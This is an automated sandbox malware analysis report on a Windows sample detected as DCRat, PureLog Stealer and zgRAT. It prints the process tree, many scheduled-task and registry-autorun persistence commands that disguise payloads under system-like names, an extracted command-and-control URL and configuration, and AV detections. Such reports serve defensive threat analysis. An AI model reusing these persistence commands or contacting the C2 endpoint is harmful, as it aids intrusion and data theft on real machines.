Windows Analysis Report
7aHY4r6vXR.exe

Overview

General Information

Sample name: 7aHY4r6vXR.exe (renamed because original name is a hash value)
Original sample name: ccd01051f9e8bf3301b3bdd406f0bc24.exe
Analysis ID: 1587305
MD5: ccd01051f9e8bf3301b3bdd406f0bc24
SHA1: 4e9f71953bd348261e9342f7dd230f274d808e4a
SHA256: 4fa025632546c9a5c346cde16c86c5d129d8381ace82e1a7d59ca865f948c533
Tags: DCRat, exe, user-abuse_ch

Detection

DCRat, PureLog Stealer, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
AI detected suspicious sample
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Drops PE files to the user root directory
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Compiles C# or VB.Net code
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • 7aHY4r6vXR.exe (PID: 6596 cmdline: "C:\Users\user\Desktop\7aHY4r6vXR.exe" MD5: CCD01051F9E8BF3301B3BDD406F0BC24)
    • wscript.exe (PID: 1460 cmdline: "C:\Windows\System32\WScript.exe" "C:\ChainBroker\WiJ0Q2cIafyWfcOMJ8mrmlFuDvVbi9nZIDl7gyLiG4eFyDELulT2kNl2MWww.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 3192 cmdline: C:\Windows\system32\cmd.exe /c ""C:\ChainBroker\IrbV6YakyWCvQIuALcoa2IhBwWZ19ItpwUlqov7vyFBfFx5s16nM.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 4144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • bridgeServerFontSavesMonitor.exe (PID: 6996 cmdline: "C:\ChainBroker/bridgeServerFontSavesMonitor.exe" MD5: 39953ACD4FD32884E6CAD0D1E4688051)
          • schtasks.exe (PID: 6632 cmdline: schtasks.exe /create /tn "SfLAFHFXIbHzHGgilQgXtKOwS" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\Local Settings\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1748 cmdline: schtasks.exe /create /tn "SfLAFHFXIbHzHGgilQgXtKOw" /sc ONLOGON /tr "'C:\Users\Default User\Local Settings\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1196 cmdline: schtasks.exe /create /tn "SfLAFHFXIbHzHGgilQgXtKOwS" /sc MINUTE /mo 6 /tr "'C:\Users\Default User\Local Settings\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • csc.exe (PID: 732 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\axeflxig\axeflxig.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • conhost.exe (PID: 3620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cvtres.exe (PID: 4900 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES69DB.tmp" "c:\Windows\System32\CSCAAFDA77B4B0340CF902F598B7E2DA6.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • schtasks.exe (PID: 1860 cmdline: schtasks.exe /create /tn "SfLAFHFXIbHzHGgilQgXtKOwS" /sc MINUTE /mo 6 /tr "'C:\Windows\Migration\WTR\SfLAFHFXIbHzHGgilQgXtKOw.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5004 cmdline: schtasks.exe /create /tn "SfLAFHFXIbHzHGgilQgXtKOw" /sc ONLOGON /tr "'C:\Windows\Migration\WTR\SfLAFHFXIbHzHGgilQgXtKOw.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6308 cmdline: schtasks.exe /create /tn "SfLAFHFXIbHzHGgilQgXtKOwS" /sc MINUTE /mo 14 /tr "'C:\Windows\Migration\WTR\SfLAFHFXIbHzHGgilQgXtKOw.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6632 cmdline: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Windows\SchCache\RuntimeBroker.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5772 cmdline: schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\SchCache\RuntimeBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 3452 cmdline: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 7 /tr "'C:\Windows\SchCache\RuntimeBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6020 cmdline: schtasks.exe /create /tn "SfLAFHFXIbHzHGgilQgXtKOwS" /sc MINUTE /mo 13 /tr "'C:\Windows\assembly\GAC_32\System.Data.OracleClient\2.0.0.0__b77a5c561934e089\SfLAFHFXIbHzHGgilQgXtKOw.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 3084 cmdline: schtasks.exe /create /tn "SfLAFHFXIbHzHGgilQgXtKOw" /sc ONLOGON /tr "'C:\Windows\assembly\GAC_32\System.Data.OracleClient\2.0.0.0__b77a5c561934e089\SfLAFHFXIbHzHGgilQgXtKOw.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6592 cmdline: schtasks.exe /create /tn "SfLAFHFXIbHzHGgilQgXtKOwS" /sc MINUTE /mo 13 /tr "'C:\Windows\assembly\GAC_32\System.Data.OracleClient\2.0.0.0__b77a5c561934e089\SfLAFHFXIbHzHGgilQgXtKOw.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 2920 cmdline: schtasks.exe /create /tn "SfLAFHFXIbHzHGgilQgXtKOwS" /sc MINUTE /mo 7 /tr "'C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 4520 cmdline: schtasks.exe /create /tn "SfLAFHFXIbHzHGgilQgXtKOw" /sc ONLOGON /tr "'C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1748 cmdline: schtasks.exe /create /tn "SfLAFHFXIbHzHGgilQgXtKOwS" /sc MINUTE /mo 6 /tr "'C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6016 cmdline: schtasks.exe /create /tn "bridgeServerFontSavesMonitorb" /sc MINUTE /mo 9 /tr "'C:\ChainBroker\bridgeServerFontSavesMonitor.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6020 cmdline: schtasks.exe /create /tn "bridgeServerFontSavesMonitor" /sc ONLOGON /tr "'C:\ChainBroker\bridgeServerFontSavesMonitor.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6644 cmdline: schtasks.exe /create /tn "bridgeServerFontSavesMonitorb" /sc MINUTE /mo 7 /tr "'C:\ChainBroker\bridgeServerFontSavesMonitor.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • cmd.exe (PID: 6016 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\FeErzF7oGb.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 7216 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • w32tm.exe (PID: 7240 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
            • SfLAFHFXIbHzHGgilQgXtKOw.exe (PID: 7576 cmdline: "C:\Users\Default User\Local Settings\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe" MD5: 39953ACD4FD32884E6CAD0D1E4688051)
  • cleanup
{"C2 url": "http://506691cm.renyash.ru/vmpoll", "MUTEX": "DCR_MUTEX-ir7LGSrsk71YAT4WpA4X", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "true", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
Source | Rule | Description | Author | Strings
7aHY4r6vXR.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
7aHY4r6vXR.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

Source | Rule | Description | Author | Strings
C:\Windows\SchCache\RuntimeBroker.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
C:\Windows\SchCache\RuntimeBroker.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000003.1734834073.0000000006F18000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000004.00000000.1794524656.0000000000CA2000.00000002.00000001.01000000.0000000A.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000000.00000003.1735483300.00000000058B1000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000004.00000002.1854260219.000000001321B000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
Process Memory Space: bridgeServerFontSavesMonitor.exe PID: 6996 | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |

Source | Rule | Description | Author | Strings
4.0.bridgeServerFontSavesMonitor.exe.ca0000.0.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
4.0.bridgeServerFontSavesMonitor.exe.ca0000.0.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.3.7aHY4r6vXR.exe.58ff717.1.raw.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
0.3.7aHY4r6vXR.exe.58ff717.1.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.3.7aHY4r6vXR.exe.6f66717.0.raw.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |

                                    System Summary

                                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Default User\Local Settings\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe" , CommandLine: "C:\Users\Default User\Local Settings\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe, NewProcessName: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe, OriginalFileName: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\FeErzF7oGb.bat" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6016, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Users\Default User\Local Settings\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe" , ProcessId: 7576, ProcessName: SfLAFHFXIbHzHGgilQgXtKOw.exe
                                    Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\ChainBroker\bridgeServerFontSavesMonitor.exe, ProcessId: 6996, TargetFilename: C:\Windows\SchCache\RuntimeBroker.exe
                                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\Default User\Local Settings\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe", EventID: 13, EventType: SetValue, Image: C:\ChainBroker\bridgeServerFontSavesMonitor.exe, ProcessId: 6996, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SfLAFHFXIbHzHGgilQgXtKOw
                                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Users\Default User\Local Settings\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe", EventID: 13, EventType: SetValue, Image: C:\ChainBroker\bridgeServerFontSavesMonitor.exe, ProcessId: 6996, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\axeflxig\axeflxig.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\axeflxig\axeflxig.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\ChainBroker/bridgeServerFontSavesMonitor.exe", ParentImage: C:\ChainBroker\bridgeServerFontSavesMonitor.exe, ParentProcessId: 6996, ParentProcessName: bridgeServerFontSavesMonitor.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\axeflxig\axeflxig.cmdline", ProcessId: 732, ProcessName: csc.exe
                                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\ChainBroker\WiJ0Q2cIafyWfcOMJ8mrmlFuDvVbi9nZIDl7gyLiG4eFyDELulT2kNl2MWww.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\ChainBroker\WiJ0Q2cIafyWfcOMJ8mrmlFuDvVbi9nZIDl7gyLiG4eFyDELulT2kNl2MWww.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\7aHY4r6vXR.exe", ParentImage: C:\Users\user\Desktop\7aHY4r6vXR.exe, ParentProcessId: 6596, ParentProcessName: 7aHY4r6vXR.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\ChainBroker\WiJ0Q2cIafyWfcOMJ8mrmlFuDvVbi9nZIDl7gyLiG4eFyDELulT2kNl2MWww.vbe" , ProcessId: 1460, ProcessName: wscript.exe
                                    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\ChainBroker\bridgeServerFontSavesMonitor.exe, ProcessId: 6996, TargetFilename: C:\Users\user\AppData\Local\Temp\axeflxig\axeflxig.cmdline

                                    Data Obfuscation

                                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\axeflxig\axeflxig.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\axeflxig\axeflxig.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\ChainBroker/bridgeServerFontSavesMonitor.exe", ParentImage: C:\ChainBroker\bridgeServerFontSavesMonitor.exe, ParentProcessId: 6996, ParentProcessName: bridgeServerFontSavesMonitor.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\axeflxig\axeflxig.cmdline", ProcessId: 732, ProcessName: csc.exe

                                    Persistence and Installation Behavior

                                    Source: Process startedAuthor: Joe Security: Data: Command: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Windows\SchCache\RuntimeBroker.exe'" /f, CommandLine: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Windows\SchCache\RuntimeBroker.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\ChainBroker/bridgeServerFontSavesMonitor.exe", ParentImage: C:\ChainBroker\bridgeServerFontSavesMonitor.exe, ParentProcessId: 6996, ParentProcessName: bridgeServerFontSavesMonitor.exe, ProcessCommandLine: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Windows\SchCache\RuntimeBroker.exe'" /f, ProcessId: 6632, ProcessName: schtasks.exe
                                    No Suricata rule has matched

                                    AV Detection

                                    Source: 7aHY4r6vXR.exe | Avira: detected
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe | Avira: detection malicious, Label: HEUR/AGEN.1339906
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe | Avira: detection malicious, Label: HEUR/AGEN.1339906
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe | Avira: detection malicious, Label: HEUR/AGEN.1339906
                                    Source: C:\ChainBroker\WiJ0Q2cIafyWfcOMJ8mrmlFuDvVbi9nZIDl7gyLiG4eFyDELulT2kNl2MWww.vbe | Avira: detection malicious, Label: VBS/Runner.VPG
                                    Source: C:\Users\user\Desktop\ARUSTYfT.log | Avira: detection malicious, Label: TR/PSW.Agent.qngqt
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe | Avira: detection malicious, Label: HEUR/AGEN.1339906
                                    Source: C:\Users\user\Desktop\riACjval.log | Avira: detection malicious, Label: TR/AVI.Agent.updqb
                                    Source: C:\Users\user\AppData\Local\Temp\FeErzF7oGb.bat | Avira: detection malicious, Label: BAT/Delbat.C
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe | Avira: detection malicious, Label: HEUR/AGEN.1339906
                                    Source: C:\Windows\SchCache\RuntimeBroker.exe | Avira: detection malicious, Label: HEUR/AGEN.1339906
                                    Source: 00000004.00000002.1854260219.000000001321B000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: DCRat {"C2 url": "http://506691cm.renyash.ru/vmpoll", "MUTEX": "DCR_MUTEX-ir7LGSrsk71YAT4WpA4X", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "true", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe | ReversingLabs: Detection: 83%
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe | Virustotal: Detection: 59%
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe | ReversingLabs: Detection: 83%
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe | Virustotal: Detection: 59%
                                    Source: C:\Users\user\Desktop\ARUSTYfT.log | ReversingLabs: Detection: 70%
                                    Source: C:\Users\user\Desktop\ARUSTYfT.log | Virustotal: Detection: 69%
                                    Source: C:\Users\user\Desktop\VObntHLa.log | ReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\VObntHLa.log | Virustotal: Detection: 34%
                                    Source: C:\Users\user\Desktop\hzhmzTUD.log | Virustotal: Detection: 10%
                                    Source: C:\Users\user\Desktop\riACjval.log | ReversingLabs: Detection: 50%
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe | ReversingLabs: Detection: 83%
                                    Source: C:\Windows\Migration\WTR\SfLAFHFXIbHzHGgilQgXtKOw.exe | ReversingLabs: Detection: 83%
                                    Source: C:\Windows\SchCache\RuntimeBroker.exe | ReversingLabs: Detection: 83%
                                    Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\2.0.0.0__b77a5c561934e089\SfLAFHFXIbHzHGgilQgXtKOw.exe | ReversingLabs: Detection: 83%
                                    Source: 7aHY4r6vXR.exe | Virustotal: Detection: 48%
                                    Source: 7aHY4r6vXR.exe | ReversingLabs: Detection: 65%
                                    Source: Submitted Sample | Integrated Neural Analysis Model: Matched 96.7% probability
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe | Joe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\hzhmzTUD.log | Joe Sandbox ML: detected
                                    Source: C:\Windows\System32\SecurityHealthSystray.exe | Joe Sandbox ML: detected
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe | Joe Sandbox ML: detected
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe | Joe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\ARUSTYfT.log | Joe Sandbox ML: detected
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe | Joe Sandbox ML: detected
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe | Joe Sandbox ML: detected
                                    Source: C:\Windows\SchCache\RuntimeBroker.exe | Joe Sandbox ML: detected
                                    Source: 7aHY4r6vXR.exe | Joe Sandbox ML: detected
                                    Source: 00000004.00000002.1854260219.000000001321B000.00000004.00000800.00020000.00000000.sdmpString decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-ir7LGSrsk71YAT4WpA4X","0","","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGFiVVp6WXpKVmFVeERTWHBKYW05cFpFaEtNVnBUU1hOSmFsRnBUMmxLTUdOdVZteEphWGRwVGxOSk5rbHVVbmxrVjFWcFRFTkpNa2xxYjJsa1NFb3hXbE5KYzBscVkybFBhVW93WTI1V2JFbHBkMmxQUTBrMlNXNVNlV1JYVldsTVEwazFTV3B2YVdSSVNqRmFVMGx6U1dwRmQwbHFiMmxrU0VveFdsTkpjMGxxUlhoSmFtOXBaRWhLTVZwVFNYTkpha1Y1U1dwdmFXUklTakZhVTBselNXcEZla2xxYjJsa1NFb3hXbE5KYzBscVJUQkphbTlwWkVoS01WcFRTamtpWFE9PSJd"]
                                    Source: 00000004.00000002.1854260219.000000001321B000.00000004.00000800.00020000.00000000.sdmpString decryptor: [["http://506691cm.renyash.ru/","vmpoll"]]
                                    Source: 7aHY4r6vXR.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: 7aHY4r6vXR.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 7aHY4r6vXR.exe
                                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\axeflxig\axeflxig.pdb source: bridgeServerFontSavesMonitor.exe, 00000004.00000002.1849804431.000000000393F000.00000004.00000800.00020000.00000000.sdmp

                                    Spreading

                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | System file written: C:\Windows\System32\SecurityHealthSystray.exe
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exe | Code function: 0_2_00BDA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00BDA69B
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exe | Code function: 0_2_00BEC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00BEC220
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe | File opened: C:\Users\user
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe | File opened: C:\Users\user\Documents\desktop.ini
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe | File opened: C:\Users\user\AppData
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe | File opened: C:\Users\user\AppData\Local\Temp
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe | File opened: C:\Users\user\Desktop\desktop.ini
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe | File opened: C:\Users\user\AppData\Local
                                    Source: bridgeServerFontSavesMonitor.exe, 00000004.00000002.1849804431.000000000393F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

                                    System Summary

